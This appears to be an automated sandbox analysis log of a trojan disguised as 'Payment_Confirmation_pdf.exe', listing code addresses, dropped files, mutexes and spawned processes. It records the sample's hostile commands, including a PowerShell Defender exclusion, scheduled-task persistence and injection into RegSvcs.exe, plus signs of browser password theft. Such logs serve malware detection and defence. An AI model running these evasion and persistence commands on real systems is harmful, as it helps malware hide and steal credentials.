Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D0CB5	10_2_014D0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A4F40	10_2_014A4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01472F28	10_2_01472F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01450F30	10_2_01450F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01422FC8	10_2_01422FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143CFE0	10_2_0143CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014AEFA0	10_2_014AEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01430E59	10_2_01430E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EEE26	10_2_014EEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EEEDB	10_2_014EEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01442E90	10_2_01442E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014ECE93	10_2_014ECE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014FB16B	10_2_014FB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0146516C	10_2_0146516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141F172	10_2_0141F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0143B1B0	10_2_0143B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014DF0CC	10_2_014DF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014370C0	10_2_014370C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E70E9	10_2_014E70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EF0E0	10_2_014EF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0141D34C	10_2_0141D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E132D	10_2_014E132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0147739A	10_2_0147739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144B2C0	10_2_0144B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014D12ED	10_2_014D12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014352A0	10_2_014352A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E7571	10_2_014E7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CD5B0	10_2_014CD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01421460	10_2_01421460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EF43F	10_2_014EF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EF7B0	10_2_014EF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E16CC	10_2_014E16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01439950	10_2_01439950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144B950	10_2_0144B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014C5910	10_2_014C5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0149D800	10_2_0149D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014338E0	10_2_014338E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EFB76	10_2_014EFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A5BF0	10_2_014A5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0146DBF9	10_2_0146DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144FB80	10_2_0144FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EFA49	10_2_014EFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E7A46	10_2_014E7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A3A6C	10_2_014A3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014DDAC6	10_2_014DDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014CDAAC	10_2_014CDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01475AA0	10_2_01475AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01433D40	10_2_01433D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E1D5A	10_2_014E1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014E7D73	10_2_014E7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_0144FDC0	10_2_0144FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014A9C32	10_2_014A9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EFCF2	10_2_014EFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EFF09	10_2_014EFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01431F92	10_2_01431F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_014EFFB1	10_2_014EFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_01439EB0	10_2_01439EB0
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_01864B01	11_2_01864B01
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_0186D63C	11_2_0186D63C
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07607748	11_2_07607748
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07609688	11_2_07609688
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07607738	11_2_07607738
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_076025E8	11_2_076025E8
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07607748	11_2_07607748
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07602E48	11_2_07602E48
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07602E58	11_2_07602E58
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07603E98	11_2_07603E98
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07602A20	11_2_07602A20
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07602A11	11_2_07602A11
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_076049D0	11_2_076049D0
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_0761C2EC	11_2_0761C2EC
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_07610040	11_2_07610040
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_0761E5C9	11_2_0761E5C9
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_0761C2DD	11_2_0761C2DD
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_08F87330	11_2_08F87330
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_08F8AFE1	11_2_08F8AFE1
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_08F87048	11_2_08F87048
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_08F87037	11_2_08F87037
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Code function: 11_2_08F8731F	11_2_08F8731F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01140100	17_2_01140100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01196000	17_2_01196000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011D02C0	17_2_011D02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01150535	17_2_01150535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01174750	17_2_01174750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01150770	17_2_01150770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0114C7C0	17_2_0114C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0116C6E0	17_2_0116C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01166962	17_2_01166962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011529A0	17_2_011529A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01152840	17_2_01152840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0115A840	17_2_0115A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01188890	17_2_01188890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011368B8	17_2_011368B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0117E8F0	17_2_0117E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0114EA80	17_2_0114EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0115AD00	17_2_0115AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0115ED7A	17_2_0115ED7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01168DBF	17_2_01168DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01158DC0	17_2_01158DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0114ADE0	17_2_0114ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01150C00	17_2_01150C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01140CF2	17_2_01140CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01170F30	17_2_01170F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01192F28	17_2_01192F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011C4F40	17_2_011C4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011CEFA0	17_2_011CEFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01142FC8	17_2_01142FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01150E59	17_2_01150E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01162E90	17_2_01162E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0113F172	17_2_0113F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0118516C	17_2_0118516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0115B1B0	17_2_0115B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0113D34C	17_2_0113D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011533F3	17_2_011533F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011552A0	17_2_011552A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0116B2C0	17_2_0116B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0116D2F0	17_2_0116D2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01141460	17_2_01141460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01153497	17_2_01153497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011974E0	17_2_011974E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0115B730	17_2_0115B730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01159950	17_2_01159950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0116B950	17_2_0116B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01155990	17_2_01155990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011BD800	17_2_011BD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011538E0	17_2_011538E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0116FB80	17_2_0116FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0118DBF9	17_2_0118DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011C5BF0	17_2_011C5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011C3A6C	17_2_011C3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01153D40	17_2_01153D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_0116FDC0	17_2_0116FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_011C9C32	17_2_011C9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01169C20	17_2_01169C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01151F92	17_2_01151F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 17_2_01159EB0	17_2_01159EB0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 011BEA12 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0149EA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01197E54 appears 97 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0141B970 appears 272 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01477E54 appears 101 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 014AF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 01465130 appears 58 times

Source: Payment_Confirmation_pdf.exe

Static PE information: invalid certificate

Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1429945253.00000000075D1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameQNDp.exe: vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1421683345.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000000.1301713102.0000000000C52000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameQNDp.exe: vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1430554978.0000000008EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShe vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1427083355.0000000004129000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1427083355.0000000004145000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1430090025.0000000007760000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe, 00000000.00000002.1429337605.0000000005BC0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs Payment_Confirmation_pdf.exe
Source: Payment_Confirmation_pdf.exe	Binary or memory string: OriginalFilenameQNDp.exe: vs Payment_Confirmation_pdf.exe

Source: Payment_Confirmation_pdf.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Payment_Confirmation_pdf.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: cQwRvD.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Payment_Confirmation_pdf.exe.4145828.1.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Payment_Confirmation_pdf.exe.5bc0000.4.raw.unpack, id.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, UVSPe1HaZ7PT1moVSI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Confirmation_pdf.exe.41eeff0.2.raw.unpack, XZoroxKebvtGCIPa9b.cs	Security API names: _0020.AddAccessRule
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, UVSPe1HaZ7PT1moVSI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.cs	Security API names: _0020.SetAccessControl
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment_Confirmation_pdf.exe.7760000.5.raw.unpack, XZoroxKebvtGCIPa9b.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@25/16@9/5

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

File created: C:\Users\user\AppData\Roaming\cQwRvD.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Mutant created: \Sessions\1\BaseNamedObjects\hdhDxjDTpsD
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5108:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

File created: C:\Users\user\AppData\Local\Temp\tmp6A84.tmp

Jump to behavior

Source: Payment_Confirmation_pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Payment_Confirmation_pdf.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Payment_Confirmation_pdf.exe, 00000000.00000000.1301713102.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, cQwRvD.exe.0.dr	Binary or memory string: UPDATE [dbo].[adUsers] SET [samAccountName] = @samAccountName, [_dn] = @_dn, [phoneCorp] = @phoneCorp, [phoneMobile] = @phoneMobile, [IpPhone] = @IpPhone, [key_card] = @key_card WHERE (([id] = @Original_id) AND ([samAccountName] = @Original_samAccountName) AND ([_dn] = @Original__dn) AND ((@IsNull_phoneCorp = 1 AND [phoneCorp] IS NULL) OR ([phoneCorp] = @Original_phoneCorp)) AND ((@IsNull_phoneMobile = 1 AND [phoneMobile] IS NULL) OR ([phoneMobile] = @Original_phoneMobile)) AND ((@IsNull_IpPhone = 1 AND [IpPhone] IS NULL) OR ([IpPhone] = @Original_IpPhone)) AND ((@IsNull_key_card = 1 AND [key_card] IS NULL) OR ([key_card] = @Original_key_card)));
Source: sdiagnhost.exe, 00000013.00000003.1844372041.0000000000983000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.0000000000983000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.000000000098D000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000002.2549013869.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 00000013.00000003.1844142956.0000000000962000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment_Confirmation_pdf.exe, 00000000.00000000.1301713102.0000000000C52000.00000002.00000001.01000000.00000003.sdmp, cQwRvD.exe.0.dr	Binary or memory string: INSERT INTO [dbo].[Employee_photo] ([Id], [SerialNumber], [ePhoto], [ePath], [id_empl]) VALUES (@Id, @SerialNumber, @ePhoto, @ePath, @id_empl);

Source: Payment_Confirmation_pdf.exe	Virustotal: Detection: 39%
Source: Payment_Confirmation_pdf.exe	ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

File read: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment_Confirmation_pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cQwRvD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp6A84.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Payment_Confirmation_pdf.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\cQwRvD.exe C:\Users\user\AppData\Roaming\cQwRvD.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cQwRvD" /XML "C:\Users\user\AppData\Local\Temp\tmp9BD5.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\cQwRvD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Program Files (x86)\JZZsGcsPsARSuUgODzETesZnARHvsqZSeMlpDbYoFZlqmwGaICbIOTkQtohiFAmdzWuOucBPlSG\mYtMtAAMpAtCOL.exe	Process created: C:\Windows\SysWOW64\sdiagnhost.exe "C:\Windows\SysWOW64\sdiagnhost.exe"
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
